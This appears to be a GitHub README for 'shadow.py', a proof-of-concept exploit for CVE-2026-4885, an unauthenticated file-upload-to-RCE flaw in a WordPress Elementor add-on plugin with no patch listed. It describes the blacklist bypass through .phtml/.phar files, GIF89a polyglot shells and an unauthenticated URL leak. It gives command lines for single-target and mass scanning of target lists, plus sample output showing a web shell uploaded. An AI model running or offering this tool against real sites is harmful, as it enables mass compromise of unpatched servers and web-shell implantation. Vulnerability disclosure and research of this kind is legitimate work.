xShadow-Here/CVE-2026-4885

# CVE-2026-4885 Piotnet Addons for Elementor Pro <= 7.1.70 - Unauthenticated Arbitrary File Upload → RCE ### Description : The **Piotnet Addons for Elementor Pro** plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `pafe_ajax_form_builder` function in all versions up to, and including, **7.1.70**. The plugin uses an **incomplete extension blacklist** that only blocks `php`, `phpt`, `php5`, `php7`, and `exe` extensions, while allowing dangerous extensions such as `.phar` or `.phtml` to be uploaded freely. This makes it possible for **unauthenticated attackers** to upload arbitrary PHP files on the affected site's server, leading to **Remote Code Execution (RCE)**. # INFO : [**CVE-2026-4885**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/piotnet-addons-for-elementor-pro/piotnet-addons-for-elementor-pro-7170-unauthenticated-arbitrary-file-upload-via-form-file-upload) ~ **CVSS Score : 9.8 (Critical)** ~ **CVSS Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H** ~ **Affected Versions : <= 7.1.70** ~ **Patched : No patch available** ~ **Publicly Published : May 18, 2026** - Researcher : [**Wannes Verwimp**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wannes-verwimp) - PoC by : **Shadow & Friska** 🩷 ### Root Cause : // Incomplete blacklist — only blocks: $blocked = ['php', 'phpt', 'php5', 'php7', 'exe']; // .phtml, .phar, .shtml etc. pass through freely ✓ Upload path leakable via unauthenticated `pafe_export_database` AJAX action → CSV export contains full file URLs. ### Usage : **Interactive menu (default) :** python3 shadow.py ╾──── MENU ────╼ 1 ▶ one target 2 ▶ mass scan 3 ▶ exit [1/2/3] : **Single target (CLI) :** python3 shadow.py -u https://target.com python3 shadow.py -u https://target.com -s shell.phtml **Mass targets (CLI) :** python3 shadow.py -f targets.txt -t 20 python3 shadow.py -f targets.txt -t 20 -s shell.phtml **Options :** -u, --url Target URL -f, --file File with target URLs (one per line) -s, --shell Custom PHP shell file (GIF89a auto-prepended) -t, --threads Concurrent threads for mass mode (default: 5) -h, --help Show help ### Features : - 🩷 Fully interactive menu (one target / mass scan) - ⚡ Async parallel recon — crawls pages concurrently - 🔍 Auto-discovery of `form_id`, `post_id`, `field_name` from page HTML - 🪄 GIF89a polyglot magic bytes — bypass image type checks - 📡 URL leak via `pafe_export_database` (no auth, no nonce) - 🎯 Shell upload verification (HTTP 200 + PHP execution check) - 💾 Auto-save results to `shell.txt` - 🌐 Mass mode with configurable threads + async semaphore - ⚠️ Blocked extension warning shown before upload prompt ### Shell : Prepare your shell file locally (e.g. `shadow.phtml`) — GIF89a magic bytes are **auto-prepended** if missing. ### Output : ╔══════════════════════════════════════════════════════════╗ ║ ║ ║ ♡ CVE-2026-4885 ║ ║ Piotnet Addons for Elementor Pro <= 7.1.70 ║ ║ Unauthenticated File Upload → RCE ║ ║ ║ ║ by Shadow & Friska ♡ ║ ║ ║ ╚══════════════════════════════════════════════════════════╝ ╾──── VERSION ────╼ ♡ v7.1.67 <= 7.1.70 — VULNERABLE ╾──── RECON ────╼ ◆ scanning 46 pages (parallel)... ♡ [PIOTNET] https://target.com/contact post_id=9 | form_id=72071c0 ◆ using : https://target.com/contact ╾──── EXPLOIT ────╼ ◆ post_id=9 | form_id=72071c0 | field=file ▶ trying .phtml ... ♡ uploaded (.phtml) ♡ URL leak : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml ╔══════════════════════════════════════════════════════════╗ ║ ★ SHELL UPLOADED (.phtml) ║ ║ ║ ║ ◆ shell : https://target.com/wp-content/... ║ ╚══════════════════════════════════════════════════════════╝ ### Requirements : pip install httpx ## Disclaimer : This tool is for **educational and authorized security testing purposes only**. Unauthorized use against systems you do not own or do not have explicit permission to test is **illegal**. The authors are not responsible for any misuse or damage caused by this tool.